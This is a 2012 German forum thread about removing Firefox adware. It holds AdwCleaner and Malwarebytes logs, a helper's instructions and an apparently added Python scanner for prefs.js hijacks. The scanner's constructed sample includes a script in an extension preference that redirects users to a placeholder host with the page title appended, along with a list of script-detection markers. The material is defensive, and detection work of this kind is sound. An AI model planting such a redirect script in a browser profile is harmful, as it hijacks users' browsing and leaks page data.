-\\ Internet Explorer v9.0.8112.16421

[OK] Die Registrierungsdatenbank ist sauber.

-\\ Mozilla Firefox v16.0.2 (de)

Profilname : default
Datei : C:\Users\ASUS TT\AppData\Roaming\Mozilla\Firefox\Profiles\ewlyys0h.default\prefs.js
Gefunden : user_pref("browser.search.selectedEngine", "MyStart Search");
Gefunden : user_pref("extensions.5026b649cf863.scode", "(function(){try{if('aol.com,mail.google.com,mystart.inc[...]

*************************

AdwCleaner[R1].txt - [1811 octets] - [24/10/2012 19:00:38]
AdwCleaner[R2].txt - [1871 octets] - [24/10/2012 22:05:06]
AdwCleaner[S1].txt - [1771 octets] - [24/10/2012 22:05:22]
AdwCleaner[R3].txt - [1148 octets] - [24/10/2012 22:11:05]
AdwCleaner[S2].txt - [1210 octets] - [24/10/2012 22:11:48]
AdwCleaner[R4].txt - [1178 octets] - [24/10/2012 22:13:43]
AdwCleaner[R5].txt - [1273 octets] - [29/10/2012 22:44:36]

########## EOF - C:\AdwCleaner[R5].txt - [1333 octets] ##########
|
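AdwCleaner's two Firefox findings above are both lines in the profile's prefs.js: a search engine switched to "MyStart Search", and an `extensions.<id>.scode` preference whose value is JavaScript rather than a setting. Checks of that kind are easy to reproduce offline. The Python below is an added example, not AdwCleaner's code and not part of the original thread; it parses `user_pref(...)` lines and reports three hijack patterns. The trusted-engine and trusted-host allow-lists are assumptions to be tuned per user, the sample prefs.js is constructed for the example (the preference name `extensions.5026b649cf863.scode` is taken from the log above, its script body and the host `mystart.example` are placeholders).

```python
import re
from urllib.parse import urlsplit

# One prefs.js line:  user_pref("name", value);
# value is a JavaScript string literal, an integer, or true/false.
PREF_LINE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)+)",\s*(.+)\);\s*$')

# Allow-lists are this example's assumptions; adjust them to the profile owner's habits.
TRUSTED_ENGINES = {"Google", "Bing", "Yahoo", "DuckDuckGo", "Wikipedia (de)"}
TRUSTED_SEARCH_HOSTS = {"www.google.com", "www.google.de", "www.bing.com", "search.yahoo.com"}
URL_PREFS = ("keyword.URL", "browser.startup.homepage", "browser.newtab.url")
SCRIPT_MARKERS = ("function(", "document.write", "location.href", "eval(", "<script")

# Constructed sample; only the two preference names come from the AdwCleaner log above.
SAMPLE_PREFS = r"""
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1351521780);
user_pref("browser.search.selectedEngine", "MyStart Search");
user_pref("browser.startup.homepage", "about:home");
user_pref("extensions.5026b649cf863.scode", "(function(){try{if('aol.com,mail.google.com'.indexOf(location.host)>-1){location.href='http://mystart.example/?r='+encodeURIComponent(document.title);}}catch(e){}})();");
user_pref("extensions.lastAppVersion", "16.0.2");
user_pref("keyword.URL", "http://mystart.example/search?q=");
user_pref("privacy.donottrackheader.enabled", true);
"""


def parse_prefs(text: str) -> dict:
    """Parse user_pref lines into a name -> value dict (str, int or bool values)."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if not m:
            continue
        name, raw = m.group(1), m.group(2).strip()
        if raw.startswith('"') and raw.endswith('"'):
            value = re.sub(r'\\(.)', r'\1', raw[1:-1])  # undo JS backslash escapes
        elif raw in ("true", "false"):
            value = raw == "true"
        else:
            try:
                value = int(raw)
            except ValueError:
                value = raw
        prefs[name] = value
    return prefs


def scan_prefs(prefs: dict, trusted_engines=TRUSTED_ENGINES,
               trusted_hosts=TRUSTED_SEARCH_HOSTS) -> list:
    """Return (pref_name, reason) pairs for search-engine, URL and script-in-pref hijacks."""
    findings = []
    engine = prefs.get("browser.search.selectedEngine")
    if isinstance(engine, str) and engine not in trusted_engines:
        findings.append(("browser.search.selectedEngine", f"search engine switched to {engine!r}"))
    for name in URL_PREFS:
        value = prefs.get(name)
        if isinstance(value, str) and value.startswith(("http://", "https://")):
            host = urlsplit(value).hostname or ""
            if host not in trusted_hosts:
                findings.append((name, f"points at untrusted host {host!r}"))
    for name, value in prefs.items():
        if (name.startswith("extensions.") and isinstance(value, str)
                and any(marker in value for marker in SCRIPT_MARKERS)):
            findings.append((name, "JavaScript stored in an extension preference"))
    return findings


if __name__ == "__main__":
    for name, reason in scan_prefs(parse_prefs(SAMPLE_PREFS)):
        print(f"{name}: {reason}")
```

Two practical points follow from the log. First, the R5 scan of 29.10. still lists both preferences although the S1 and S2 delete passes on 24.10. came before it; that is typically what you see when Firefox was open during the cleanup (it rewrites prefs.js on exit) or when the extension that owns the `scode` value is still installed and restores it, so the extension itself has to go, not just the line. Second, deleting lines from prefs.js by hand only sticks if Firefox is closed while you edit.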
31.10.2012, 16:54 | #20 | |
/// Winkelfunktion /// TB-Süch-Tiger™ | Quote:
One tries to gather information systematically in the form of log files in order to come across inconsistencies there! Of course you can format away any problem, however small, but that does not help everyone! Looks ok. We should be almost done. As a check, please run a scan with Malwarebytes and post the log. Remember to update the tool before the scan!!
__________________ Always post log files in CODE tags |
01.11.2012, 01:04 | #21 |
| Hello Cosinus, thanks for the info. Here is the log file from Malwarebytes, nothing found. Code:
ATTFilter
Malwarebytes Anti-Malware 1.65.1.1000
www.malwarebytes.org

Datenbank Version: v2012.10.31.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
ASUS TT :: ASUSTT-PC [Administrator]

31.10.2012 18:02:08
mbam-log-2012-10-31 (18-02-08).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|E:\|)
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 316292
Laufzeit: 25 Minute(n), 24 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 0
(Keine bösartigen Objekte gefunden)

(Ende)

There is always a blue icon here with the following context: "Click to Continue > by DownloadNSave". When I then click on it, in this case the following advertising page comes up: "hxxp://www.westwing.de/lp/lp4/?mdprefid=marketing_de_af10030&utm_source=mds&utm_medium=aff&utm_campaign=standard&utm_term=de_mds_txt_0&aff=de.aff.mds.standard..de_mds_txt_001&affid=1014&affsub=101329". Regards, Thomas |
01.11.2012, 14:31 | #22 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Please post the ESET log first. After that we will take care of the other stuff.
__________________ Always post log files in CODE tags |